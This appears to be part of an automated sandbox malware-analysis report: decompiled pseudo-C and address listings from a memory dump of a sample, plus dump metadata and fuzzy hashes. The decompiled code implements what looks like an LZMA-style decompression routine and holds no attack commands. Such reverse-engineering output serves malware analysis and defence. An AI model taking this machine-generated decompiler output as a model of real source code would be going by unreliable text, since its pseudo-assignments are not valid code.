                  												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                  												__al = __al & 0x000000fd;
                  												__eax = (__eflags >= 0) - 1 + 0xb;
                  												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                  												goto L120;
                  											case 0x16:
                  												__eax =  *(__ebp - 0x30);
                  												__eflags = __eax - 4;
                  												if(__eax >= 4) {
                  													_push(3);
                  													_pop(__eax);
                  												}
                  												__ecx =  *(__ebp - 4);
                  												 *(__ebp - 0x40) = 6;
                  												__eax = __eax << 7;
                  												 *(__ebp - 0x7c) = 0x19;
                  												 *(__ebp - 0x58) = __eax;
                  												goto L145;
                  											case 0x17:
                  												L145:
                  												__eax =  *(__ebp - 0x40);
                  												 *(__ebp - 0x50) = 1;
                  												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                  												goto L149;
                  											case 0x18:
                  												L146:
                  												__eflags =  *(__ebp - 0x6c);
                  												if( *(__ebp - 0x6c) == 0) {
                  													 *(__ebp - 0x88) = 0x18;
                  													goto L170;
                  												}
                  												__ecx =  *(__ebp - 0x70);
                  												__eax =  *(__ebp - 0xc);
                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  												_t484 = __ebp - 0x70;
                  												 *_t484 =  *(__ebp - 0x70) + 1;
                  												__eflags =  *_t484;
                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  												L148:
                  												_t487 = __ebp - 0x48;
                  												 *_t487 =  *(__ebp - 0x48) - 1;
                  												__eflags =  *_t487;
                  												L149:
                  												__eflags =  *(__ebp - 0x48);
                  												if( *(__ebp - 0x48) <= 0) {
                  													__ecx =  *(__ebp - 0x40);
                  													__ebx =  *(__ebp - 0x50);
                  													0 = 1;
                  													__eax = 1 << __cl;
                  													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                  													__eax =  *(__ebp - 0x7c);
                  													 *(__ebp - 0x44) = __ebx;
                  													while(1) {
                  														 *(_t621 - 0x88) = _t542;
                  														goto L1;
                  													}
                  												}
                  												__eax =  *(__ebp - 0x50);
                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                  												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                  												__eax =  *(__ebp - 0x58);
                  												__esi = __edx + __eax;
                  												 *(__ebp - 0x54) = __esi;
                  												__ax =  *__esi;
                  												__edi = __ax & 0x0000ffff;
                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                  												__eflags =  *(__ebp - 0xc) - __ecx;
                  												if( *(__ebp - 0xc) >= __ecx) {
                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                  													__cx = __ax;
                  													__cx = __ax >> 5;
                  													__eax = __eax - __ecx;
                  													__edx = __edx + 1;
                  													__eflags = __edx;
                  													 *__esi = __ax;
                  													 *(__ebp - 0x50) = __edx;
                  												} else {
                  													 *(__ebp - 0x10) = __ecx;
                  													0x800 = 0x800 - __edi;
                  													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                  													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                  													 *__esi = __cx;
                  												}
                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                  												if( *(__ebp - 0x10) >= 0x1000000) {
                  													goto L148;
                  												} else {
                  													goto L146;
                  												}
                  											case 0x19:
                  												__eflags = __ebx - 4;
                  												if(__ebx < 4) {
                  													 *(__ebp - 0x2c) = __ebx;
                  													L119:
                  													_t393 = __ebp - 0x2c;
                  													 *_t393 =  *(__ebp - 0x2c) + 1;
                  													__eflags =  *_t393;
                  													L120:
                  													__eax =  *(__ebp - 0x2c);
                  													__eflags = __eax;
                  													if(__eax == 0) {
                  														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                  														goto L170;
                  													}
                  													__eflags = __eax -  *(__ebp - 0x60);
                  													if(__eax >  *(__ebp - 0x60)) {
                  														goto L171;
                  													}
                  													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                  													__eax =  *(__ebp - 0x30);
                  													_t400 = __ebp - 0x60;
                  													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                  													__eflags =  *_t400;
                  													goto L123;
                  												}
                  												__ecx = __ebx;
                  												__eax = __ebx;
                  												__ecx = __ebx >> 1;
                  												__eax = __ebx & 0x00000001;
                  												__ecx = (__ebx >> 1) - 1;
                  												__al = __al | 0x00000002;
                  												__eax = (__ebx & 0x00000001) << __cl;
                  												__eflags = __ebx - 0xe;
                  												 *(__ebp - 0x2c) = __eax;
                  												if(__ebx >= 0xe) {
                  													__ebx = 0;
                  													 *(__ebp - 0x48) = __ecx;
                  													L102:
                  													__eflags =  *(__ebp - 0x48);
                  													if( *(__ebp - 0x48) <= 0) {
                  														__eax = __eax + __ebx;
                  														 *(__ebp - 0x40) = 4;
                  														 *(__ebp - 0x2c) = __eax;
                  														__eax =  *(__ebp - 4);
                  														__eax =  *(__ebp - 4) + 0x644;
                  														__eflags = __eax;
                  														L108:
                  														__ebx = 0;
                  														 *(__ebp - 0x58) = __eax;
                  														 *(__ebp - 0x50) = 1;
                  														 *(__ebp - 0x44) = 0;
                  														 *(__ebp - 0x48) = 0;
                  														L112:
                  														__eax =  *(__ebp - 0x40);
                  														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                  														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                  															_t391 = __ebp - 0x2c;
                  															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                  															__eflags =  *_t391;
                  															goto L119;
                  														}
                  														__eax =  *(__ebp - 0x50);
                  														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                  														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                  														__eax =  *(__ebp - 0x58);
                  														__esi = __edi + __eax;
                  														 *(__ebp - 0x54) = __esi;
                  														__ax =  *__esi;
                  														__ecx = __ax & 0x0000ffff;
                  														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                  														__eflags =  *(__ebp - 0xc) - __edx;
                  														if( *(__ebp - 0xc) >= __edx) {
                  															__ecx = 0;
                  															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                  															__ecx = 1;
                  															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                  															__ebx = 1;
                  															__ecx =  *(__ebp - 0x48);
                  															__ebx = 1 << __cl;
                  															__ecx = 1 << __cl;
                  															__ebx =  *(__ebp - 0x44);
                  															__ebx =  *(__ebp - 0x44) | __ecx;
                  															__cx = __ax;
                  															__cx = __ax >> 5;
                  															__eax = __eax - __ecx;
                  															__edi = __edi + 1;
                  															__eflags = __edi;
                  															 *(__ebp - 0x44) = __ebx;
                  															 *__esi = __ax;
                  															 *(__ebp - 0x50) = __edi;
                  														} else {
                  															 *(__ebp - 0x10) = __edx;
                  															0x800 = 0x800 - __ecx;
                  															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                  															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                  															 *__esi = __dx;
                  														}
                  														__eflags =  *(__ebp - 0x10) - 0x1000000;
                  														if( *(__ebp - 0x10) >= 0x1000000) {
                  															L111:
                  															_t368 = __ebp - 0x48;
                  															 *_t368 =  *(__ebp - 0x48) + 1;
                  															__eflags =  *_t368;
                  															goto L112;
                  														} else {
                  															goto L109;
                  														}
                  													}
                  													__ecx =  *(__ebp - 0xc);
                  													__ebx = __ebx + __ebx;
                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                  													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                  													 *(__ebp - 0x44) = __ebx;
                  													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                  														__ecx =  *(__ebp - 0x10);
                  														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                  														__ebx = __ebx | 0x00000001;
                  														__eflags = __ebx;
                  														 *(__ebp - 0x44) = __ebx;
                  													}
                  													__eflags =  *(__ebp - 0x10) - 0x1000000;
                  													if( *(__ebp - 0x10) >= 0x1000000) {
                  														L101:
                  														_t338 = __ebp - 0x48;
                  														 *_t338 =  *(__ebp - 0x48) - 1;
                  														__eflags =  *_t338;
                  														goto L102;
                  													} else {
                  														goto L99;
                  													}
                  												}
                  												__edx =  *(__ebp - 4);
                  												__eax = __eax - __ebx;
                  												 *(__ebp - 0x40) = __ecx;
                  												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                  												goto L108;
                  											case 0x1a:
                  												L56:
                  												__eflags =  *(__ebp - 0x64);
                  												if( *(__ebp - 0x64) == 0) {
                  													 *(__ebp - 0x88) = 0x1a;
                  													goto L170;
                  												}
                  												__ecx =  *(__ebp - 0x68);
                  												__al =  *(__ebp - 0x5c);
                  												__edx =  *(__ebp - 8);
                  												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                  												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                  												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                  												 *( *(__ebp - 0x68)) = __al;
                  												__ecx =  *(__ebp - 0x14);
                  												 *(__ecx +  *(__ebp - 8)) = __al;
                  												__eax = __ecx + 1;
                  												__edx = 0;
                  												_t192 = __eax %  *(__ebp - 0x74);
                  												__eax = __eax /  *(__ebp - 0x74);
                  												__edx = _t192;
                  												goto L79;
                  											case 0x1b:
                  												L75:
                  												__eflags =  *(__ebp - 0x64);
                  												if( *(__ebp - 0x64) == 0) {
                  													 *(__ebp - 0x88) = 0x1b;
                  													goto L170;
                  												}
                  												__eax =  *(__ebp - 0x14);
                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                  												__eflags = __eax -  *(__ebp - 0x74);
                  												if(__eax >=  *(__ebp - 0x74)) {
                  													__eax = __eax +  *(__ebp - 0x74);
                  													__eflags = __eax;
                  												}
                  												__edx =  *(__ebp - 8);
                  												__cl =  *(__eax + __edx);
                  												__eax =  *(__ebp - 0x14);
                  												 *(__ebp - 0x5c) = __cl;
                  												 *(__eax + __edx) = __cl;
                  												__eax = __eax + 1;
                  												__edx = 0;
                  												_t274 = __eax %  *(__ebp - 0x74);
                  												__eax = __eax /  *(__ebp - 0x74);
                  												__edx = _t274;
                  												__eax =  *(__ebp - 0x68);
                  												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                  												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                  												_t283 = __ebp - 0x64;
                  												 *_t283 =  *(__ebp - 0x64) - 1;
                  												__eflags =  *_t283;
                  												 *( *(__ebp - 0x68)) = __cl;
                  												L79:
                  												 *(__ebp - 0x14) = __edx;
                  												goto L80;
                  											case 0x1c:
                  												while(1) {
                  													L123:
                  													__eflags =  *(__ebp - 0x64);
                  													if( *(__ebp - 0x64) == 0) {
                  														break;
                  													}
                  													__eax =  *(__ebp - 0x14);
                  													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                  													__eflags = __eax -  *(__ebp - 0x74);
                  													if(__eax >=  *(__ebp - 0x74)) {
                  														__eax = __eax +  *(__ebp - 0x74);
                  														__eflags = __eax;
                  													}
                  													__edx =  *(__ebp - 8);
                  													__cl =  *(__eax + __edx);
                  													__eax =  *(__ebp - 0x14);
                  													 *(__ebp - 0x5c) = __cl;
                  													 *(__eax + __edx) = __cl;
                  													__eax = __eax + 1;
                  													__edx = 0;
                  													_t414 = __eax %  *(__ebp - 0x74);
                  													__eax = __eax /  *(__ebp - 0x74);
                  													__edx = _t414;
                  													__eax =  *(__ebp - 0x68);
                  													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                  													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                  													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                  													__eflags =  *(__ebp - 0x30);
                  													 *( *(__ebp - 0x68)) = __cl;
                  													 *(__ebp - 0x14) = _t414;
                  													if( *(__ebp - 0x30) > 0) {
                  														continue;
                  													} else {
                  														L80:
                  														 *(__ebp - 0x88) = 2;
                  														goto L1;
                  													}
                  												}
                  												 *(__ebp - 0x88) = 0x1c;
                  												goto L170;
                  										}
                  									}
                  									L171:
                  									_t544 = _t543 | 0xffffffff;
                  									goto L172;
                  								}
                  							}
                  						}
                  					}
                  					goto L1;
                  				}
                  			}














                  0x004060ac
                  0x004060af
                  0x004060b1
                  0x004060b2
                  0x004060b5
                  0x00000000
                  0x004060b5
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406355
                  0x00406359
                  0x0040637c
                  0x0040637f
                  0x00406382
                  0x0040638c
                  0x0040635b
                  0x0040635b
                  0x0040635e
                  0x00406361
                  0x00406364
                  0x00406371
                  0x00406374
                  0x00406374
                  0x004066b8
                  0x004066b8
                  0x004066b8
                  0x00000000
                  0x004066b8
                  0x00000000
                  0x00406398
                  0x0040639c
                  0x00000000
                  0x00000000
                  0x004063a2
                  0x004063a6
                  0x00000000
                  0x00000000
                  0x004063ac
                  0x004063ae
                  0x004063b2
                  0x004063b2
                  0x004063b5
                  0x004063b9
                  0x00000000
                  0x00000000
                  0x00406409
                  0x0040640d
                  0x00406414
                  0x00406417
                  0x0040641a
                  0x00406424
                  0x004066b8
                  0x004066b8
                  0x004066b8
                  0x00000000
                  0x004066b8
                  0x004066b8
                  0x0040640f
                  0x00000000
                  0x00000000
                  0x00406430
                  0x00406434
                  0x0040643b
                  0x0040643e
                  0x00406441
                  0x00406436
                  0x00406436
                  0x00406436
                  0x00406444
                  0x00406447
                  0x0040644a
                  0x0040644a
                  0x0040644d
                  0x00406450
                  0x00406453
                  0x00406453
                  0x00406456
                  0x0040645d
                  0x00406462
                  0x00000000
                  0x00000000
                  0x004064f0
                  0x004064f0
                  0x004064f4
                  0x00406892
                  0x00000000
                  0x00406892
                  0x004064fa
                  0x004064fd
                  0x00406500
                  0x00406504
                  0x00406507
                  0x0040650d
                  0x0040650f
                  0x0040650f
                  0x0040650f
                  0x00406512
                  0x00406515
                  0x00000000
                  0x00000000
                  0x004060e5
                  0x004060e5
                  0x004060e9
                  0x00406856
                  0x00000000
                  0x00406856
                  0x004060ef
                  0x004060f2
                  0x004060f5
                  0x004060f9
                  0x004060fc
                  0x00406102
                  0x00406104
                  0x00406104
                  0x00406104
                  0x00406107
                  0x0040610a
                  0x0040610a
                  0x0040610d
                  0x00406110
                  0x00000000
                  0x00000000
                  0x00406116
                  0x0040611c
                  0x00000000
                  0x00000000
                  0x00406122
                  0x00406122
                  0x00406126
                  0x00406129
                  0x0040612c
                  0x0040612f
                  0x00406132
                  0x00406133
                  0x00406136
                  0x00406138
                  0x0040613e
                  0x00406141
                  0x00406144
                  0x00406147
                  0x0040614a
                  0x0040614d
                  0x00406150
                  0x0040616c
                  0x0040616f
                  0x00406172
                  0x00406175
                  0x0040617c
                  0x00406180
                  0x00406182
                  0x00406186
                  0x00406152
                  0x00406152
                  0x00406156
                  0x0040615e
                  0x00406163
                  0x00406165
                  0x00406167
                  0x00406167
                  0x00406189
                  0x00406190
                  0x00406193
                  0x00000000
                  0x00406199
                  0x00000000
                  0x00406199
                  0x00000000
                  0x0040619e
                  0x0040619e
                  0x004061a2
                  0x00406862
                  0x00000000
                  0x00406862
                  0x004061a8
                  0x004061ab
                  0x004061ae
                  0x004061b2
                  0x004061b5
                  0x004061bb
                  0x004061bd
                  0x004061bd
                  0x004061bd
                  0x004061c0
                  0x004061c3
                  0x004061c3
                  0x004061c3
                  0x004061c9
                  0x00000000
                  0x00000000
                  0x004061cb
                  0x004061ce
                  0x004061d1
                  0x004061d4
                  0x004061d7
                  0x004061da
                  0x004061dd
                  0x004061e0
                  0x004061e3
                  0x004061e6
                  0x004061e9
                  0x00406201
                  0x00406204
                  0x00406207
                  0x0040620a
                  0x0040620a
                  0x0040620d
                  0x00406211
                  0x00406213
                  0x004061eb
                  0x004061eb
                  0x004061f3
                  0x004061f8
                  0x004061fa
                  0x004061fc
                  0x004061fc
                  0x00406216
                  0x0040621d
                  0x00406220
                  0x00000000
                  0x00406222
                  0x00000000
                  0x00406222
                  0x00406220
                  0x00406227
                  0x00406227
                  0x00406227
                  0x00406227
                  0x00000000
                  0x00000000
                  0x00406262
                  0x00406262
                  0x00406266
                  0x0040686e
                  0x00000000
                  0x0040686e
                  0x0040626c
                  0x0040626f
                  0x00406272
                  0x00406276
                  0x00406279
                  0x0040627f
                  0x00406281
                  0x00406281
                  0x00406281
                  0x00406284
                  0x00406287
                  0x00406287
                  0x0040628d
                  0x0040622b
                  0x0040622b
                  0x0040622e
                  0x00000000
                  0x0040622e
                  0x0040628f
                  0x0040628f
                  0x00406292
                  0x00406295
                  0x00406298
                  0x0040629b
                  0x0040629e
                  0x004062a1
                  0x004062a4
                  0x004062a7
                  0x004062aa
                  0x004062ad
                  0x004062c5
                  0x004062c8
                  0x004062cb
                  0x004062ce
                  0x004062ce
                  0x004062d1
                  0x004062d5
                  0x004062d7
                  0x004062af
                  0x004062af
                  0x004062b7
                  0x004062bc
                  0x004062be
                  0x004062c0
                  0x004062c0
                  0x004062da
                  0x004062e1
                  0x004062e4
                  0x00000000
                  0x004062e6
                  0x00000000
                  0x004062e6
                  0x00000000
                  0x00406573
                  0x00406573
                  0x00406577
                  0x0040689e
                  0x00000000
                  0x0040689e
                  0x0040657d
                  0x00406580
                  0x00406583
                  0x00406587
                  0x0040658a
                  0x00406590
                  0x00406592
                  0x00406592
                  0x00406592
                  0x00406595
                  0x00000000
                  0x00000000
                  0x00406343
                  0x00406343
                  0x00406346
                  0x004066b8
                  0x004066b8
                  0x004066b8
                  0x00000000
                  0x004066b8
                  0x00000000
                  0x00406682
                  0x00406686
                  0x004066a8
                  0x004066ab
                  0x004066b5
                  0x004066b8
                  0x004066b8
                  0x004066b8
                  0x00000000
                  0x004066b8
                  0x004066b8
                  0x00406688
                  0x0040668b
                  0x0040668f
                  0x00406692
                  0x00406692
                  0x00406695
                  0x00000000
                  0x00000000
                  0x0040673f
                  0x00406743
                  0x00406761
                  0x00406761
                  0x00406761
                  0x00406768
                  0x0040676f
                  0x00406776
                  0x00406776
                  0x00000000
                  0x00406776
                  0x00406745
                  0x00406748
                  0x0040674b
                  0x0040674e
                  0x00406755
                  0x00406699
                  0x00406699
                  0x0040669c
                  0x00000000
                  0x00000000
                  0x00406830
                  0x00406833
                  0x00406734
                  0x00000000
                  0x00000000
                  0x0040646a
                  0x0040646c
                  0x00406473
                  0x00406474
                  0x00406476
                  0x00406479
                  0x00000000
                  0x00000000
                  0x00406481
                  0x00406484
                  0x00406487
                  0x00406489
                  0x0040648b
                  0x0040648b
                  0x0040648c
                  0x0040648f
                  0x00406496
                  0x00406499
                  0x004064a7
                  0x00000000
                  0x00000000
                  0x0040677d
                  0x0040677d
                  0x00406780
                  0x00406787
                  0x00000000
                  0x00000000
                  0x0040678c
                  0x0040678c
                  0x00406790
                  0x004068c8
                  0x00000000
                  0x004068c8
                  0x00406796
                  0x00406799
                  0x0040679c
                  0x004067a0
                  0x004067a3
                  0x004067a9
                  0x004067ab
                  0x004067ab
                  0x004067ab
                  0x004067ae
                  0x004067b1
                  0x004067b1
                  0x004067b1
                  0x004067b1
                  0x004067b4
                  0x004067b4
                  0x004067b8
                  0x00406818
                  0x0040681b
                  0x00406820
                  0x00406821
                  0x00406823
                  0x00406825
                  0x00406828
                  0x00406734
                  0x00406734
                  0x00000000
                  0x0040673a
                  0x00406734
                  0x004067ba
                  0x004067c0
                  0x004067c3
                  0x004067c6
                  0x004067c9
                  0x004067cc
                  0x004067cf
                  0x004067d2
                  0x004067d5
                  0x004067d8
                  0x004067db
                  0x004067f4
                  0x004067f7
                  0x004067fa
                  0x004067fd
                  0x00406801
                  0x00406803
                  0x00406803
                  0x00406804
                  0x00406807
                  0x004067dd
                  0x004067dd
                  0x004067e5
                  0x004067ea
                  0x004067ec
                  0x004067ef
                  0x004067ef
                  0x0040680a
                  0x00406811
                  0x00000000
                  0x00406813
                  0x00000000
                  0x00406813
                  0x00000000
                  0x004064af
                  0x004064b2
                  0x004064e8
                  0x00406618
                  0x00406618
                  0x00406618
                  0x00406618
                  0x0040661b
                  0x0040661b
                  0x0040661e
                  0x00406620
                  0x004068aa
                  0x00000000
                  0x004068aa
                  0x00406626
                  0x00406629
                  0x00000000
                  0x00000000
                  0x0040662f
                  0x00406633
                  0x00406636
                  0x00406636
                  0x00406636
                  0x00000000
                  0x00406636
                  0x004064b4
                  0x004064b6
                  0x004064b8
                  0x004064ba
                  0x004064bd
                  0x004064be
                  0x004064c0
                  0x004064c2
                  0x004064c5
                  0x004064c8
                  0x004064de
                  0x004064e3
                  0x0040651b
                  0x0040651b
                  0x0040651f
                  0x0040654b
                  0x0040654d
                  0x00406554
                  0x00406557
                  0x0040655a
                  0x0040655a
                  0x0040655f
                  0x0040655f
                  0x00406561
                  0x00406564
                  0x0040656b
                  0x0040656e
                  0x0040659b
                  0x0040659b
                  0x0040659e
                  0x004065a1
                  0x00406615
                  0x00406615
                  0x00406615
                  0x00000000
                  0x00406615
                  0x004065a3
                  0x004065a9
                  0x004065ac
                  0x004065af
                  0x004065b2
                  0x004065b5
                  0x004065b8
                  0x004065bb
                  0x004065be
                  0x004065c1
                  0x004065c4
                  0x004065dd
                  0x004065df
                  0x004065e2
                  0x004065e3
                  0x004065e6
                  0x004065e8
                  0x004065eb
                  0x004065ed
                  0x004065ef
                  0x004065f2
                  0x004065f4
                  0x004065f7
                  0x004065fb
                  0x004065fd
                  0x004065fd
                  0x004065fe
                  0x00406601
                  0x00406604
                  0x004065c6
                  0x004065c6
                  0x004065ce
                  0x004065d3
                  0x004065d5
                  0x004065d8
                  0x004065d8
                  0x00406607
                  0x0040660e
                  0x00406598
                  0x00406598
                  0x00406598
                  0x00406598
                  0x00000000
                  0x00406610
                  0x00000000
                  0x00406610
                  0x0040660e
                  0x00406521
                  0x00406524
                  0x00406526
                  0x00406529
                  0x0040652c
                  0x0040652f
                  0x00406531
                  0x00406534
                  0x00406537
                  0x00406537
                  0x0040653a
                  0x0040653a
                  0x0040653d
                  0x00406544
                  0x00406518
                  0x00406518
                  0x00406518
                  0x00406518
                  0x00000000
                  0x00406546
                  0x00000000
                  0x00406546
                  0x00406544
                  0x004064ca
                  0x004064cd
                  0x004064cf
                  0x004064d2
                  0x00000000
                  0x00000000
                  0x00406231
                  0x00406231
                  0x00406235
                  0x0040687a
                  0x00000000
                  0x0040687a
                  0x0040623b
                  0x0040623e
                  0x00406241
                  0x00406244
                  0x00406247
                  0x0040624a
                  0x0040624d
                  0x0040624f
                  0x00406252
                  0x00406255
                  0x00406258
                  0x0040625a
                  0x0040625a
                  0x0040625a
                  0x00000000
                  0x00000000
                  0x004063bc
                  0x004063bc
                  0x004063c0
                  0x00406886
                  0x00000000
                  0x00406886
                  0x004063c6
                  0x004063c9
                  0x004063cc
                  0x004063cf
                  0x004063d1
                  0x004063d1
                  0x004063d1
                  0x004063d4
                  0x004063d7
                  0x004063da
                  0x004063dd
                  0x004063e0
                  0x004063e3
                  0x004063e4
                  0x004063e6
                  0x004063e6
                  0x004063e6
                  0x004063e9
                  0x004063ec
                  0x004063ef
                  0x004063f2
                  0x004063f2
                  0x004063f2
                  0x004063f5
                  0x004063f7
                  0x004063f7
                  0x00000000
                  0x00000000
                  0x00406639
                  0x00406639
                  0x00406639
                  0x0040663d
                  0x00000000
                  0x00000000
                  0x00406643
                  0x00406646
                  0x00406649
                  0x0040664c
                  0x0040664e
                  0x0040664e
                  0x0040664e
                  0x00406651
                  0x00406654
                  0x00406657
                  0x0040665a
                  0x0040665d
                  0x00406660
                  0x00406661
                  0x00406663
                  0x00406663
                  0x00406663
                  0x00406666
                  0x00406669
                  0x0040666c
                  0x0040666f
                  0x00406672
                  0x00406676
                  0x00406678
                  0x0040667b
                  0x00000000
                  0x0040667d
                  0x004063fa
                  0x004063fa
                  0x00000000
                  0x004063fa
                  0x0040667b
                  0x004068b0
                  0x00000000
                  0x00000000
                  0x00405edf
                  0x004068e7
                  0x004068e7
                  0x00000000
                  0x004068e7
                  0x00406734
                  0x004066bb
                  0x004066b8
                  0x00000000
                  0x004062ef

                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
                  • Instruction ID: 4708b7c85b45d81bde2c34293bfadd2d5d28089b3d5bcf645a888e2e7e0fcfc2
                  • Opcode Fuzzy Hash: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
                  • Instruction Fuzzy Hash: 91711371D00229DFDF24CFA8C844BADBBB1FB44305F15816AD816B7281D7389996DF54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 98%
                  			E00406409() {
                  				unsigned short _t531;
                  				signed int _t532;
                  				void _t533;
                  				signed int _t534;
                  				signed int _t535;
                  				signed int _t565;
                  				signed int _t568;
                  				signed int _t589;
                  				signed int* _t606;
                  				void* _t613;
                  
                  				L0:
                  				while(1) {
                  					L0:
                  					if( *(_t613 - 0x40) != 0) {
                  						 *(_t613 - 0x84) = 0xb;
                  						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                  						goto L132;
                  					} else {
                  						__eax =  *(__ebp - 0x28);
                  						L88:
                  						 *(__ebp - 0x2c) = __eax;
                  						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                  						L89:
                  						__eax =  *(__ebp - 4);
                  						 *(__ebp - 0x80) = 0x15;
                  						__eax =  *(__ebp - 4) + 0xa68;
                  						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                  						L69:
                  						 *(__ebp - 0x84) = 0x12;
                  						while(1) {
                  							L132:
                  							 *(_t613 - 0x54) = _t606;
                  							while(1) {
                  								L133:
                  								_t531 =  *_t606;
                  								_t589 = _t531 & 0x0000ffff;
                  								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                  								if( *(_t613 - 0xc) >= _t565) {
                  									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                  									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                  									 *(_t613 - 0x40) = 1;
                  									_t532 = _t531 - (_t531 >> 5);
                  									 *_t606 = _t532;
                  								} else {
                  									 *(_t613 - 0x10) = _t565;
                  									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                  									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                  								}
                  								if( *(_t613 - 0x10) >= 0x1000000) {
                  									goto L139;
                  								}
                  								L137:
                  								if( *(_t613 - 0x6c) == 0) {
                  									 *(_t613 - 0x88) = 5;
                  									L170:
                  									_t568 = 0x22;
                  									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                  									_t535 = 0;
                  									L172:
                  									return _t535;
                  								}
                  								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                  								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                  								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                  								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                  								L139:
                  								_t533 =  *(_t613 - 0x84);
                  								while(1) {
                  									 *(_t613 - 0x88) = _t533;
                  									while(1) {
                  										L1:
                  										_t534 =  *(_t613 - 0x88);
                  										if(_t534 > 0x1c) {
                  											break;
                  										}
                  										switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
                  											case 0:
                  												if( *(_t613 - 0x6c) == 0) {
                  													goto L170;
                  												}
                  												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                  												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                  												_t534 =  *( *(_t613 - 0x70));
                  												if(_t534 > 0xe1) {
                  													goto L171;
                  												}
                  												_t538 = _t534 & 0x000000ff;
                  												_push(0x2d);
                  												asm("cdq");
                  												_pop(_t570);
                  												_push(9);
                  												_pop(_t571);
                  												_t609 = _t538 / _t570;
                  												_t540 = _t538 % _t570 & 0x000000ff;
                  												asm("cdq");
                  												_t604 = _t540 % _t571 & 0x000000ff;
                  												 *(_t613 - 0x3c) = _t604;
                  												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                  												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                  												_t612 = (0x300 << _t604 + _t609) + 0x736;
